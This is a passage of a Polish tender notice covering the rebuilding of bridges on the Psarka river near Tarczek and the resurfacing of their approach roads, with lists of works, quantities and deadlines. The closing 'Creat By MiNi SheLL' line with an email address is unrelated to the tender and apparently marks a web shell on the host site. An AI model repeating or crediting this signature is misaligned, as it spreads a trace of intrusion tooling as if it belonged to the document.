-    przebudowie ścianki zaplecznej oraz wykonaniu podparcia pod płyty przejściowe,
                 -    wykonaniu płyt przejściowych  gr.25 cm i długości 400 cm,
-    nadbudowie skrzydełek z dostosowaniem do zamocowania barieroporęczy 
     sztywnej
-    wykonaniu ciosów podłożyskowych i montażu łożysk elastomerowych,
-    montażu dźwigarów blachownicowych oraz poprzecznic,
-    wykonaniu żelbetowej, zespolonej ze stalowym rusztem płyty pomostu 
     o gr. 18 cm,
-    wykonaniu izolacji termozgrzewalnej na płycie pomostu,
-    montażu sączków fi50 mm i wpustów krawężnikowych z rurami spustowymi
      fi 160 mm, wykonaniu drenaży podłużnych i poprzecznych,
-    ustawieniu krawężników kamiennych 20x20 cm oraz polimerobetonowych desek 
     gzymsowych 4x48 cm kotwionych w belkach podporęczowych,
-     wykonaniu belek podporęczowych,
-    zamocowaniu barieroporęczy sztywnej przekładkowej o wys. 110 cm po obu 
     stronach obiektu,
-    wykonaniu na dojazdach wpustów ściekowych krawężnikowo-jezdniowych klasy
     C250 kN osadzonych na pierścieniach betonowych i studzienkach osadnikowych
     fi 425 mm,
-    wykonaniu warstw podbudowy w obrębie płyt przejściowych oraz krawężników 
     drogowych na dojazdach,
-    wykonaniu umocnienia stożków skarpowych brukiem kamiennym na podsypce 
      cementowo - piaskowej 1:4 gr. 5 cm
-     wykonaniu podbudowy zasadniczej nawierzchni jezdni na dojazdach
-    wykonaniu warstwy ochronnej izolacji z asfaltu lanego MA11 gr. 5 cm i warstwy 
      ścieralnej z betonu asfaltowego AC11S gr. 4 cm,
- wykonaniu żywicznej nawierzchnioizolacji belek podporeczowych 
     z uszczelnieniami bitumicznymi od strony krawężnika i desek gzymsowych,
-    wykonaniu napraw zaprawami PCC i szpachlowaniu podpór,
-  zabezpieczeniu antykorozyjnym podpór oraz spodu płyty pomostu powłoką
      malarską z minimalna zdolnością pokrywania zarysowań,
- zabezpieczeniu antykorozyjnym spodu wsporników płyty pomostu powłoką 
     malarską z podwyższoną zdolnością pokrywania zarysowań,
-    wykonaniu schodów skarpowych
-    montażu barier ochronnych na dojazdach,
-  wykonaniu umocnienia skarp i dna koryta rzeki w obrębie mostu narzutem 
     kamiennym.

Niweleta na obiekcie zostanie podniesiona od cm 3 do 10 cm.
Po wykonaniu przebudowy nośność obiektu będzie odpowiadać klasie C  wg PN-85/S-10030, zatem dopuszczalny ciężar pojazdów poruszających się po moście wynosił będzie 30 ton. 

Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa załączona do niniejszej specyfikacji.

2.	Opis dotyczący wzmocnienia nawierzchni drogi dojazdowej do mostu - długość 230mb.

Zamówienie obejmuje wykonanie:
- podbudowy z mieszanki MCE metodą głębokiego recyklingu - 945 m2
- nawierzchni z mieszanki mineralno-asfaltowej  Ruch KR 2
  warstwa wiążąca  - 945 m2 , warstwa ścieralna - 995 m2 
           - przepustu pod korona drogi  - 8 mb
           - poboczy z kruszywa łamanego zaklinowanych destruktem -375 m2
           - oczyszczenie rowu wraz z profilowaniem skarp - 87 m3
           - umocnienie skarp i dna rowu płytami ażurowymi betonowymi - 36 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.11-3, 45.23.32.20-7, 45.23.24.52-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa mostu na rzece Psarka w ciągu drogi powiatowej nr 0602 T 
                     Tarczek - Grabków  w miejscowości Tarczek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje:
             - Przebudowę mostu na rzece Psarka w ciągu drogi powiatowej nr 0602 T 
               Tarczek - Grabków  w miejscowości Tarczek
             - wzmocnienie nawierzchni na drodze dojazdowej do mostu  - droga powiatowa  
               nr 0602 T Tarczek - Grabków  (od drogi wojewódzkiej nr 752 do mostu).
             - wzmocnienie nawierzchni na drodze dojazdowej do mostu -droga powiatowa 
                nr 0602 T Tarczek - Grabków (od m. Tarczek Górny do mostu).

1.	Opis dotyczący  przebudowy mostu.

a. Stan istniejący 
   Most wybudowany został w latach siedemdziesiątych. Obiekt usytuowany jest na prostym odcinku drogi powiatowej nr 0602 T  na terenie zabudowanym. Przeszkodą jest rzeka Psarka, która płynie pod kątem ok. 80° w stosunku do drogi powiatowej. Niweletę na obiekcie stanowi linia prosta o spadku podłużnym wynoszącym 0,25% w kierunku miejscowości Tarczek.
Most składa się z jednego przęsła o schemacie statycznym belki swobodnie podpartej. Przekrój poprzeczny ustroju nośnego stanowi 17 prefabrykowanych belek sprężonych, kablobetonowych typu Kujan o wysokości h=37 cm i długości teoretycznej Lt=10,0 m. Szerokość całkowita obiektu wynosi 9,08 m. Ustrój nośny oparty jest na podporach za pośrednictwem stalowych łożysk stycznych.
Podpory skrajne obiektu stanowią żelbetowe przyczółki pełnościenne. Posadowienie podpór nie jest znane. Brak jest dokumentacji archiwalnej obiektu.
Przekrój poprzeczny pomostu jest krawężnikowy. W pomoście można wyróżnić jezdnię o nawierzchni bitumicznej szerokości 6,18 m oraz dwa chodniki szerokości 1,45 m. Krawężniki na moście betonowe wystające nad poziom jezdni tylko 3-6 cm. Balustrady wykonane są z żelbetowych słupków 18x18 cm wypełnionych poziomymi przeciągami rurowymi. 
Odwodnienie na obiekcie odbywa się za pomocą spadków poprzecznych i podłużnego. Brak odwodnienia z poziomu izolacji oraz urządzeń dylatacyjnych. Stożki nasypu są nieumocnione i lokalnie rozmyte przez wodę spływająca z poziomu jezdni w obrębie skrzydełka.

 Dane ogólne:
Długość całkowita (ze skrzydełkami)	LcGW = 15,82 m od strony górnej wody
			LcDW = 15,68 m od strony dolnej wody
Długość ustroju nośnego			Lk = 10,74 m - 10,80 m
Szerokość całkowita			Bc = 9,08 m
Szerokość użytkowa			Bu = 8,47 m
Szerokość jezdni			Bj = 6,18 m
Szerokość chodników			Bch = 2x1,45 m
Układ statyczny			belka swobodnie podparta 
Przeszkoda			rzeka Psarka
Kąt skrzyżowania osi podłużnej
drogi z osią przeszkody			80°
Konstrukcja przęsła	belki kablobetonowe typu  Kujan 
Nawierzchnia                                Nawierzchnia jezdni	                       warstwy bitumiczne gr. 8 cm
	Nawierzchnia chodników 		beton
Nawierzchni	    				
Odwodnienie płyty ustroju nośnego		powierzchniowe za pomocą spadku podłużnego i spadków poprzecznych poza obiekt
Urządzenia bezpieczeństwa 		balustrada o wysokości 101 cm z żelbetowych słupków 18x18 cm  i stalowych przeciągów rurowych
Przyczółki	 		pełnościenne żelbetowe 
Płyty przejściowe 			brak danych
Posadowienie			brak danych
Łożyska			stalowe styczne
Urządzenia dylatacyjne			brak szczelnych przekryć dylatacyjnych
Urządzenia obce	nie stwierdzono podczas przeglądu
Brak jest archiwalnej Dokumentacji technicznej obiektu.

b.	Stan projektowany 

  Celem przebudowy mostu jest konieczność poprawy bezpieczeństwa użytkowników, przywrócenie konstrukcji i innym elementom obiektu cech utraconych podczas eksploatacji,  w tym zapewnienie odpowiedniej jego trwałości. Zachodzi również potrzeba wykonania płyt przejściowych na dojazdach do mostu.
Forma architektoniczna pozostaje bez zmian. Przebudowa pozwoli na poprawienie walorów estetycznych istniejącego obiektu.
Przebudowa mostu będzie polegała na usunięciu istniejących warstw nawierzchni jezdni gr. śr. 8 cm, betonu ochronnego izolacji gr. 6 cm, izolacji mastyksowej oraz rozbiórce istniejących elementów wyposażenia i skuciu kap chodnikowych. Wykonana zostanie żelbetowa płyta wyrównawczo-spadkowa, zespolona z istniejącym ustrojem nośnym. Wykonane zostaną również kapy chodnikowe dostosowane do zamontowania barieroporęczy sztywnych bezprzekładkowych. Kapy chodnikowe zostaną oddzielone od jezdni kotwionym krawężnikiem kamiennym 20x18cm, wyniesionym 14 cm powyżej poziomu jezdni 
i ułożonym na zaprawie niskoskurczowej.
W celu poprawienia bezpieczeństwa po obu stronach mostu wykonane zostaną barieroporęcze sztywne bezprzekładkowe o wysokości 110 cm, których taśma będzie znajdować się na wysokości 75 cm nad powierzchnią chodnika.  Bariery zlokalizowane na moście przedłużone zostaną na dojazdach barierami drogowymi typu SP-04/2. 
Przewidziano podniesienie niwelety jezdni na moście o 5 cm z uwagi na konieczność wykonania płyty wyrównawczo-spadkowej o gr. śr. 10cm.

Przebudowa mostu w miejscowości Tarczek polegała będzie na:

-    demontażu nawierzchni jezdni, warstwy ochronnej oraz izolacji,
-    demontażu balustrad oraz chodników,
-    odkuciu skorodowanego betonu spodu ustroju nośnego oraz podpór i wykonanie
      napraw powierzchniowych zaprawami PCC,
-     wykonaniu podparcia pod płyty przejściowe,
-     wykonaniu płyt przejściowych  gr. 25cm i długości 400 cm,
-     wykonaniu żelbetowej, zespolonej z istniejącym ustrojem nośnym płyty 
      wyrównawczo-spadkowej,
-     wykonaniu izolacji termozgrzewalnej,
-     ustawieniu na zaprawie niskoskurczowej krawężników kamiennych kotwionych 
      20x18 cm,
-     montażu polimerobetonowych desek gzymsowych,
-     wykonaniu kap chodnikowych,
-     nadbudowie skrzydełek z dostosowaniem do zamontowania barieroporęczy
       sztywnych,
-     zamocowaniu barieroporęczy bezprzekładkowej o wys. 110 cm  po obu stronach 
      obiektu,
-     usprawnieniu odwodnienia poprzez wykonanie drenaży podłużnych i 
      poprzecznych wprowadzonych do sączków, poprzez zastosowanie odpowiednich 
      spadków poprzecznych.
-  wykonaniu warstwy ochronnej izolacji z asfaltu lanego gr. 5cm i warstwy ścieralnej 
    z betonu asfaltowego (AC) gr. 4 cm,
- wykonaniu umocnienia stożków brukiem kamiennym na podsypce cem. - 
    piaskowej 1:4 gr. 10 cm,
-   szpachlowaniu podpór oraz spodu ustroju nośnego, 
- zabezpieczeniu antykorozyjnym podpór powłoką z minimalną zdolnością 
     pokrywania zarysowań,
- zabezpieczeniu antykorozyjnym spodu belek Kujan powłoką bez zdolności 
    pokrywania zarysowań,
-  zabezpieczeniu antykorozyjnym spodu wsporników oraz boków ustroju nośnego 
     powłoką z podwyższoną zdolnością pokrywania zarysowań,
-    wykonanie innych niezbędnych robót konserwacyjno-remontowych.

Niweleta na obiekcie zostanie podniesiona średnio o 5 cm.
Po wykonaniu przebudowy nośność ustroju nośnego będzie odpowiadać klasie B
wg PN-85/S-10030, zatem dopuszczalny ciężar pojazdów poruszających się po moście wynosił będzie 40 ton. 



2.	opis dotyczący wzmocnienia nawierzchni na drodze dojazdowej do mostu
a. odcinek   od drogi  wojewódzkiej nr 752 - 600mb.

  Zakres robót obejmuje:
- frezowanie nawierzchni bitumicznej - 34 m2
- odtworzenie chodnika z kostki brukowej - 70m2
- wykonanie podbudowy z mieszanki MCE metodą głębokiego recyklingu - 3404,20 m2
- wyrównanie nawierzchni mieszanką mineralno-asfaltową  ruch KR2 - 143 t
- wykonanie nawierzchni z mieszanki mineralno-asfaltowej  Ruch KR 2
  warstwa wiążąca  - 3 438,20 m2 , warstwa ścieralna - 3438,20 m2 
           - zjazdy do posesji  z kruszywa łamanego  zaklinowane destruktem  - 141 m2
           - wykonanie  poboczy z kruszywa łamanego zaklinowanych destruktem -742,50 m2
           - oczyszczenie rowu wraz z profilowaniem skarpy i przeciwskarpy - 148,50 m3
           - oznakowanie poziome cienkowarstwowe - 30 m2

b. odcinek  od m. Tarczek Górny do mostu - 455 mb.
 
          Zakres robót obejmuje:

 - karczowanie pni - 25 szt
- wykonanie podbudowy z mieszanki MCE metodą głębokiego recyklingu - 2525 m2
- wykonanie nawierzchni z mieszanki mineralno-asfaltowej  Ruch KR 2
  warstwa wiążąca  - 2 525 m2 , warstwa ścieralna - 2 525 m2 
           - zjazdy - część przelotowa z rur HDPE fi 40 - 12 mb
           - wykonanie nawierzchni na zjazdach  z kruszywa drogowego  zaklinowane destruktem - 
              36 m2
           - oczyszczenie rowu wraz z profilowaniem skarp i przeciwskarpy - 231,60 m3
          -  pobocza z kruszywa łamanego  zamknięte destruktem - 443 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.11-3, 45.23.32.20-7, 45.23.24.52-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com